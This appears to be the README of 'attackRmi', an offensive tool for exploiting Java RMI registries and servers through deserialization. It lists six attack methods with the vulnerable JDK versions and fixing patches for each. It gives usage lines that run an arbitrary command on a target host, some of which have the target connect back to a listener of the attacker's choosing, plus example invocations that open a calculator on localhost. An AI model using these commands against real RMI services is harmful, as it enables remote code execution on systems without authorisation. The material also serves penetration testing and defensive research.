Awesome
attackRmi
This project uses the socket to send packets directly to attack rmi. The following jdk version refers to the version of openjdk
The following methods attack rmi by deserialization, so the following 6 attack methods require the local classpath to contain gadgets
AttackRegistryByBindAndAnnotationInvocationHandler
This is actually the RMIRegistryExploit of ysoserial.
condition:
- <jdk8u121
https://hg.openjdk.java.net/jdk8u/jdk8u/jdk/rev/75f31e0bd829/
AttackRegistryByDGC
condition:
- <jdk8u121
https://hg.openjdk.java.net/jdk8u/jdk8u/jdk/rev/75f31e0bd829/
AttackRegistryByLookup
condition:
- <jdk8u121
https://hg.openjdk.java.net/jdk8u/jdk8u/jdk/rev/75f31e0bd829/
AttackRegistryByLookupAndUnicastRef
condition:
- <jdk8u232
https://hg.openjdk.java.net/jdk8u/jdk8u/jdk/rev/523d48606333/
AttackRegistryByLookupAndUnicastRefRemoteObject
condition:
- <jdk8u242
https://hg.openjdk.java.net/jdk8u/jdk8u/jdk/rev/033462472c28
AttackServerByNonPrimitiveParameter
condition:
- <jdk8u242 -Types other than primitive tyep can be used
- >= jdk8u242 -Types other than primitive type and String can be used
https://hg.openjdk.java.net/jdk8u/jdk8u/jdk/rev/033462472c28
Usage
ByDGC OR ByLookup
Usage: java -jar attackRmi.jar DOL [registryHost] [registryPort] '[command]'
ByLookupAndUnicastRef OR ByLookupAndUnicastRefRemoteObject
Usage: java -jar attackRmi.jar LAU [registryHost] [registryPort] [JRMPListenHost] [JRMPListenPort]
Usage: java -jar attackRmi.jar LAUS [registryHost] [registryPort] [serverIp] [startPort] '[command]' (run at server)
ByNonPrimitiveParameter
Usage: java -jar attackRmi.jar NPP [registryHost] [registryPort] [name] '[methodSignature]' '[command]'
AttackRegistryByDGC
Usage: java -cp attackRmi.jar com.wu.attackRmi.Exploit.AttackRegistryByDGC [registryHost] [registryPort] [payload] '[command]'
AttackRegistryByLookup
Usage: java -cp attackRmi.jar com.wu.attackRmi.Exploit.AttackRegistryByLookup [registryHost] [registryPort] [payload] '[command]'
AttackRegistryByLookupAndUnicastRef
Usage: java -cp attackRmi.jar com.wu.attackRmi.Exploit.AttackRegistryByLookupAndUnicastRef [registryHost] [registryPort] [JRMPListenHost] [JRMPListenPort]
AttackRegistryByLookupAndUnicastRefRemoteObject
Usage: java -cp attackRmi.jar com.wu.attackRmi.Exploit.AttackRegistryByLookupAndUnicastRefRemoteObject [registryHost] [registryPort] [JRMPListenHost] [JRMPListenPort]
AttackServerByNonPrimitiveParameter
Usage: java -cp attackRmi.jar com.wu.attackRmi.Exploit.AttackServerByNonPrimitiveParameter [registryHost] [registryPort] [name] '[methodSignature]' [payloadType] '[command]'
example
java -jar attackRmi.jar DOL 127.0.0.1 1099 'open /System/Applications/Calculator.app'
java -jar attackRmi.jar LAUS 127.0.0.1 1099 127.0.0.1 10000 'open /System/Applications/Calculator.app'
java -jar attackRmi.jar LAU 127.0.0.1 1099 127.0.0.1 10000
java -jar attackRmi.jar NPP 127.0.0.1 1099 hello 'sayHello(Ljava/lang/String;)Ljava/lang/String;' 'open /System/Applications/Calculator.app'
For method signature, you can refer to https://stackoverflow.com/questions/8066253/compute-a-java-functions-signature
TODO
- attackRMI.jar
- brute force gadget
- brute method